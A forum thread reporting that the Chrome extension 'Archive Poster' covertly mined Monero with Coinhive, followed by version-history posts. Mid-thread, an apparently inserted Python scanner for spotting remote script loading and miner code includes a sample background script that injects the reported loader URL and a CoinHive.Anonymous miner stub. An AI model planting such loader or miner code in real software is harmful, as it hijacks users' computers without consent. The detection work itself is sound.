Chrome Extension with 100,000 Users Caught Pushing Cryptocurrency Miner

LASER_oneXM

Thread author


A Chrome extension with over 105,000 users has been deploying an in-browser cryptocurrency miner to unsuspecting users for the past few weeks.

The extension does not ask for user permission before hijacking their CPUs to mine Monero the whole time the Chrome browser is open.

Named "Archive Poster," the extension is advertised as a mod for Tumblr that allows users an easier way to "reblog, queue, draft, and like posts right from another blog's archive."

According to user reviews, around the start of December the extension incorporated the infamous Coinhive in-browser miner in its source code.



Troy Mursch, a US-based security researcher who's been keeping a close eye on the cryptojacking scene, alerted Bleeping Computer of this threat today.

According to Mursch, the Coinhive cryptojacking code is hidden in a JavaScript file loaded from the following URL:

https://c7e935.netlify[.]com/b.js

Another case of a hijacked extension? Or is it intentional?

Over the spring and summer, Chrome extension developers have been under a barrage of phishing attacks. Miscreants were trying to take over extensions, adding adware code and pushing a tainted update to the extension's userbase when successful.


Some of these phishing attacks were successful, and several cases were reported when high-profile extensions with large userbases were hijacked to push adware [1, 2, 3].


The company behind Archive Poster does not have a contact method listed on its website, so Bleeping Computer wasn't able to confirm whether this was intentional or another case of a hijacked extension.
 
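The article above reports only the indicator (a miner hidden in a script pulled at runtime from the netlify URL). As an added example that is not part of the original post and not Archive Poster's code, the script below shows the kind of static triage a practitioner would run over an unpacked extension to catch that pattern: it flags scripts fetched from the network at runtime (script.src / importScripts / fetch), remote origins whitelisted in the manifest CSP, and the public Coinhive API (CoinHive.Anonymous, coinhive.min.js). The extension files it scans are constructed for the example; the loader host is the defanged URL from the post written out in plain form, and the Coinhive stub is a placeholder showing what the fetched payload's miner call looks like, not the real b.js.

```python
"""Static triage of an unpacked Chrome extension for remote script loading
and Coinhive-style in-browser miner indicators. Added example; not the
extension's code and not from the original post."""
import json
import re
from typing import Dict, List
from urllib.parse import urlparse

# Hosts worth flagging. c7e935.netlify.com is the loader URL reported in the
# article; coinhive.com is where the public Coinhive library was served from.
KNOWN_MINER_HOSTS = {"coinhive.com", "c7e935.netlify.com"}

# Coinhive's public JavaScript API: scripts instantiate
# CoinHive.Anonymous(siteKey) and call .start().
MINER_API_PATTERNS = {
    "coinhive_constructor": re.compile(r"CoinHive\.Anonymous\s*\("),
    "coinhive_library": re.compile(r"coinhive\.min\.js"),
}

# Ways extension code pulls script from the network at runtime; capture the URL.
REMOTE_LOAD_PATTERNS = {
    "script_src": re.compile(r"""\.src\s*=\s*['"](https?://[^'"]+)['"]"""),
    "importScripts": re.compile(r"""importScripts\s*\(\s*['"](https?://[^'"]+)['"]"""),
    "fetch": re.compile(r"""fetch\s*\(\s*['"](https?://[^'"]+)['"]"""),
}


def scan_extension(files: Dict[str, str]) -> List[dict]:
    """Return findings for an unpacked extension given as {path: contents}."""
    findings = []
    manifest = json.loads(files.get("manifest.json", "{}"))

    # A CSP that whitelists an external origin lets remote code run in the
    # extension's own pages; record every http(s) origin it allows.
    csp = manifest.get("content_security_policy", "")
    for token in csp.split():
        token = token.rstrip(";")
        if token.startswith("http"):
            host = urlparse(token).hostname or ""
            findings.append({"file": "manifest.json", "kind": "csp_remote_origin",
                             "url": token, "known_miner": host in KNOWN_MINER_HOSTS})

    for path, body in files.items():
        if not path.endswith(".js"):
            continue
        for kind, pat in REMOTE_LOAD_PATTERNS.items():
            for m in pat.finditer(body):
                url = m.group(1)
                host = urlparse(url).hostname or ""
                findings.append({"file": path, "kind": kind, "url": url,
                                 "known_miner": host in KNOWN_MINER_HOSTS})
        for kind, pat in MINER_API_PATTERNS.items():
            if pat.search(body):
                findings.append({"file": path, "kind": kind})
    return findings


def known_miner_findings(findings: List[dict]) -> List[dict]:
    """Subset of findings tied to a known miner host or the Coinhive API."""
    return [f for f in findings
            if f.get("known_miner") or f["kind"].startswith("coinhive")]


# Constructed sample extension (not the real Archive Poster package): a
# background page that injects a remote script from the reported loader URL,
# a benign content script, and a stub of what the fetched payload's Coinhive
# call would look like. SITE_KEY_PLACEHOLDER is a placeholder, not a real key.
SAMPLE_EXTENSION = {
    "manifest.json": json.dumps({
        "manifest_version": 2,
        "name": "sample-ext",
        "version": "0.0.1",
        "background": {"scripts": ["background.js"]},
        "content_security_policy":
            "script-src 'self' https://c7e935.netlify.com; object-src 'self'",
    }),
    "background.js": (
        "var s = document.createElement('script');\n"
        "s.src = 'https://c7e935.netlify.com/b.js';\n"
        "document.head.appendChild(s);\n"
    ),
    "content.js": (
        "document.querySelectorAll('.post').forEach(function (p) {"
        " p.dataset.seen = '1'; });\n"
    ),
    "miner_stub_constructed.js": (
        "var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');\n"
        "miner.start();\n"
    ),
}

if __name__ == "__main__":
    for finding in scan_extension(SAMPLE_EXTENSION):
        print(finding)
```

Against the constructed sample this reports three findings: the CSP origin, the script.src load of b.js, and the CoinHive.Anonymous call in the stub. In practice you would point it at the extracted CRX directory (the extension archive Tsiehshi mentions below is the same kind of package) and diff the findings across versions to see exactly which update introduced the loader.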

Tsiehshi

The Archive Poster extension has been shipping the hidden Coinhive cryptojacker for at least four versions, from 4.4.3.994 to 4.4.3.998.

It actually seems to date back at least to the 4.4.3.93 version (Dec 8th according to the last modification date of verified_contents.json).

PS. A Chrome Webstore reviewer said he used to love it until it was updated on 12/7/2017. That's not a contradiction as the extension archive isn't updated every day (probably wasn't updated on the 7th).

PPS. At 9:34 PM, it got updated to 4.4.4.0 (damn, the hackers are fast). And they'll approve it again and again.

+ 11:30 PM: 4.4.4.01. Once every 2 hours or what?

PPPS. Here's a more detailed version history, which means it started with 4.4.3.91.

PPPPS. Finally taken down. Good riddance.
 
